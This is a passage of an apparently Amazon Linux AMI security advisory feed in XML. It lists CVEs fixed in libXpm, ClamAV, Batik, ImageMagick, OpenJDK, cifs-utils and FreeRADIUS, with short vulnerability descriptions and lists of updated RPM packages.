</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40320" title="" id="CVE-2022-40320" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libconfuse-devel" version="2.7" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libconfuse-devel-2.7-4.4.amzn1.x86_64.rpm</filename></package><package name="libconfuse-debuginfo" version="2.7" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libconfuse-debuginfo-2.7-4.4.amzn1.x86_64.rpm</filename></package><package name="libconfuse" version="2.7" release="4.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/libconfuse-2.7-4.4.amzn1.x86_64.rpm</filename></package><package name="libconfuse" version="2.7" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/libconfuse-2.7-4.4.amzn1.i686.rpm</filename></package><package name="libconfuse-debuginfo" version="2.7" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/libconfuse-debuginfo-2.7-4.4.amzn1.i686.rpm</filename></package><package name="libconfuse-devel" version="2.7" release="4.4.amzn1" epoch="0" arch="i686"><filename>Packages/libconfuse-devel-2.7-4.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1693</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1693: important priority package update for libXpm</title><issued date="2023-02-17 00:02:00" /><updated date="2023-02-23 01:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-4883:
A flaw was found in libXpm. When processing files with .Z or .gz extensions, the library calls external programs to compress and uncompress files, relying on the PATH environment variable to find these programs, which could allow a malicious user to execute other programs by manipulating the PATH environment variable.
CVE-2022-46285:
A flaw was found in libXpm. This issue occurs when parsing a file with a comment not closed; the end-of-file condition will not be detected, leading to an infinite loop and resulting in a Denial of Service in the application linked to the library.
CVE-2022-44617:
A flaw was found in libXpm. When processing a file with width of 0 and a very large height, some parser functions will be called repeatedly and can lead to an infinite loop, resulting in a Denial of Service in the application linked to the library.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44617" title="" id="CVE-2022-44617" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46285" title="" id="CVE-2022-46285" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4883" title="" id="CVE-2022-4883" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libXpm" version="3.5.10" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-3.5.10-2.10.amzn1.x86_64.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-devel-3.5.10-2.10.amzn1.x86_64.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/libXpm-debuginfo-3.5.10-2.10.amzn1.x86_64.rpm</filename></package><package name="libXpm" version="3.5.10" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-3.5.10-2.10.amzn1.i686.rpm</filename></package><package name="libXpm-devel" version="3.5.10" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-devel-3.5.10-2.10.amzn1.i686.rpm</filename></package><package name="libXpm-debuginfo" version="3.5.10" release="2.10.amzn1" epoch="0" arch="i686"><filename>Packages/libXpm-debuginfo-3.5.10-2.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1694</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1694: critical priority package update for clamav</title><issued date="2023-02-20 20:28:00" /><updated date="2023-02-23 01:34:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-20052:
A possible remote information leak vulnerability in the DMG file parser. The issue affects versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier.
CVE-2023-20032:
Possible remote code execution vulnerability in the ClamAV HFS+ file parser. The issue affects ClamAV versions 1.0.0 and earlier, 0.105.1 and earlier, and 0.103.7 and earlier.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20032" title="" id="CVE-2023-20032" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20052" title="" id="CVE-2023-20052" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="clamav-update" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-update-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-data" version="0.103.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-data-0.103.8-1.52.amzn1.noarch.rpm</filename></package><package name="clamav-debuginfo" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-debuginfo-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-lib" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-lib-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-devel" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-devel-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamd" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamd-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-db" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-db-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-milter" version="0.103.8" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/clamav-milter-0.103.8-1.52.amzn1.x86_64.rpm</filename></package><package name="clamav-filesystem" version="0.103.8" release="1.52.amzn1" epoch="0" arch="noarch"><filename>Packages/clamav-filesystem-0.103.8-1.52.amzn1.noarch.rpm</filename></package><package name="clamav-lib" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-lib-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-debuginfo" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-debuginfo-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-devel" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-devel-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-update" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-update-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-milter" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-milter-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamav-db" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamav-db-0.103.8-1.52.amzn1.i686.rpm</filename></package><package name="clamd" version="0.103.8" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/clamd-0.103.8-1.52.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1695</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1695: important priority package update for batik</title><issued date="2023-03-02 20:21:00" /><updated date="2023-03-07 01:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-42890:
A vulnerability in Batik of Apache XML Graphics allows an attacker to run Java code from untrusted SVG via JavaScript. This issue affects Apache XML Graphics prior to 1.16. Users are recommended to upgrade to version 1.16.
CVE-2022-41704:
A vulnerability in Batik of Apache XML Graphics allows an attacker to run untrusted Java code from an SVG. This issue affects Apache XML Graphics prior to 1.16. It is recommended to update to version 1.16.
CVE-2022-40146:
Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to access files using a Jar url. This issue affects Apache XML Graphics Batik 1.14.
CVE-2022-38648:
Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to fetch external resources. This issue affects Apache XML Graphics Batik 1.14.
CVE-2022-38398:
Server-Side Request Forgery (SSRF) vulnerability in Batik of Apache XML Graphics allows an attacker to load a url thru the jar protocol. This issue affects Apache XML Graphics Batik 1.14.
CVE-2020-11987:
Apache Batik 1.13 is vulnerable to server-side request forgery, caused by improper input validation by the NodePickerPanel. By using a specially-crafted argument, an attacker could exploit this vulnerability to cause the underlying server to make arbitrary GET requests.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11987" title="" id="CVE-2020-11987" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38398" title="" id="CVE-2022-38398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38648" title="" id="CVE-2022-38648" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-40146" title="" id="CVE-2022-40146" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41704" title="" id="CVE-2022-41704" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42890" title="" id="CVE-2022-42890" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="batik-demo" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-demo-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-squiggle" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-squiggle-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-rasterizer" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-rasterizer-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-svgpp" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-svgpp-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-ttf2svg" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-ttf2svg-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-slideshow" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-slideshow-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik" version="1.7" release="10.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/batik-1.7-10.10.amzn1.x86_64.rpm</filename></package><package name="batik-javadoc" version="1.7" release="10.10.amzn1" epoch="0" arch="noarch"><filename>Packages/batik-javadoc-1.7-10.10.amzn1.noarch.rpm</filename></package><package name="batik-squiggle" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-squiggle-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-rasterizer" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-rasterizer-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-slideshow" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-slideshow-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-svgpp" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-svgpp-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-ttf2svg" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-ttf2svg-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik-demo" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-demo-1.7-10.10.amzn1.i686.rpm</filename></package><package name="batik" version="1.7" release="10.10.amzn1" epoch="0" arch="i686"><filename>Packages/batik-1.7-10.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1696</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1696: medium priority package update for ImageMagick</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-44268:
ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary. file (if the magick binary has permissions to read it).
CVE-2022-44267:
ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
CVE-2022-32547:
In ImageMagick, there is load of misaligned address for type 'double', which requires 8 byte alignment and for type 'float', which requires 4 byte alignment at MagickCore/property.c. Whenever crafted or untrusted input is processed by ImageMagick, this causes a negative impact to application availability or other problems related to undefined behavior.
CVE-2022-32546:
A vulnerability was found in ImageMagick, causing an outside the range of representable values of type 'unsigned long' at coders/pcl.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.
CVE-2022-32545:
A vulnerability was found in ImageMagick, causing an outside the range of representable values of type 'unsigned char' at coders/psd.c, when crafted or untrusted input is processed. This leads to a negative impact to application availability or other problems related to undefined behavior.
CVE-2022-28463:
ImageMagick 7.1.0-27 is vulnerable to Buffer Overflow.
CVE-2021-4219:
A flaw was found in ImageMagick. The vulnerability occurs due to improper use of open functions and leads to a denial of service. This flaw allows an attacker to crash the system.
CVE-2021-3574:
A vulnerability was found in ImageMagick. Memory leaks are detected when executing a crafted file with the convert command, affecting availability.
CVE-2021-20224:
An integer overflow issue was discovered in ImageMagick's ExportIndexQuantum() function in MagickCore/quantum-export.c. Function calls to GetPixelIndex() could result in values outside the range of representable for the 'unsigned char'. When ImageMagick processes a crafted pdf file, this could lead to an undefined behaviour or a crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20224" title="" id="CVE-2021-20224" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3574" title="" id="CVE-2021-3574" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4219" title="" id="CVE-2021-4219" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28463" title="" id="CVE-2022-28463" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32545" title="" id="CVE-2022-32545" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32546" title="" id="CVE-2022-32546" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32547" title="" id="CVE-2022-32547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44267" title="" id="CVE-2022-44267" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44268" title="" id="CVE-2022-44268" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.24.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.68-3.24.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.68" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.68-3.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1697</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1697: medium priority package update for java-1.8.0-openjdk</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-21843:
Better Banking of Sounds: JARSoundbankReader can load classes from remote URLs.
CVE-2023-21830:
Improve CORBA communication: CORBA deserialization can result in outbound network connections with data passed in.
CVE-2022-21626:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2022-21624:
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JNDI). Supported versions that are affected are Oracle Java SE: 8u341, 8u345-perf, 11.0.16.1, 17.0.4.1, 19; Oracle GraalVM Enterprise Edition: 20.3.7, 21.3.3 and 22.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21624" title="" id="CVE-2022-21624" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21626" title="" id="CVE-2022-21626" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21830" title="" id="CVE-2023-21830" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21843" title="" id="CVE-2023-21843" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.362.b08-1.72.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.362.b08-1.72.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.362.b08-1.72.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.362.b08" release="1.72.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.362.b08-1.72.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1698</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1698: important priority package update for cifs-utils</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-27239:
A stack-based buffer overflow issue was found in pifs-utils. Parsing the mount.cifs ip command-line argument can lead to local attackers gaining root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27239" title="" id="CVE-2022-27239" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cifs-utils" version="6.2" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/cifs-utils-6.2-7.7.amzn1.x86_64.rpm</filename></package><package name="cifs-utils-debuginfo" version="6.2" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/cifs-utils-debuginfo-6.2-7.7.amzn1.x86_64.rpm</filename></package><package name="cifs-utils-devel" version="6.2" release="7.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/cifs-utils-devel-6.2-7.7.amzn1.x86_64.rpm</filename></package><package name="cifs-utils-debuginfo" version="6.2" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/cifs-utils-debuginfo-6.2-7.7.amzn1.i686.rpm</filename></package><package name="cifs-utils-devel" version="6.2" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/cifs-utils-devel-6.2-7.7.amzn1.i686.rpm</filename></package><package name="cifs-utils" version="6.2" release="7.7.amzn1" epoch="0" arch="i686"><filename>Packages/cifs-utils-6.2-7.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1699</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1699: medium priority package update for freeradius</title><issued date="2023-03-02 20:22:00" /><updated date="2023-03-07 01:56:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-41860:
When an EAP-SIM supplicant sends an unknown SIM option, the server will try to look that option up in the internal dictionaries. This lookup will fail, but the SIM code will not check for that failure. Instead, it will dereference a NULL pointer, and cause the server to crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41860" title="" id="CVE-2022-41860" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="freeradius-ldap" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-ldap-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-mysql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-mysql-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-krb5-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-unixODBC" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-unixODBC-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-postgresql" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-postgresql-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-perl" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-perl-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-python-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-debuginfo-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/freeradius-utils-2.2.6-7.17.amzn1.x86_64.rpm</filename></package><package name="freeradius-debuginfo" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-debuginfo-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-utils" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-utils-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-python" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-python-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-krb5" version="2.2.6" release="7.17.amzn1" epoch="0" arch="i686"><filename>Packages/freeradius-krb5-2.2.6-7.17.amzn1.i686.rpm</filename></package><package name="freeradius-perl" 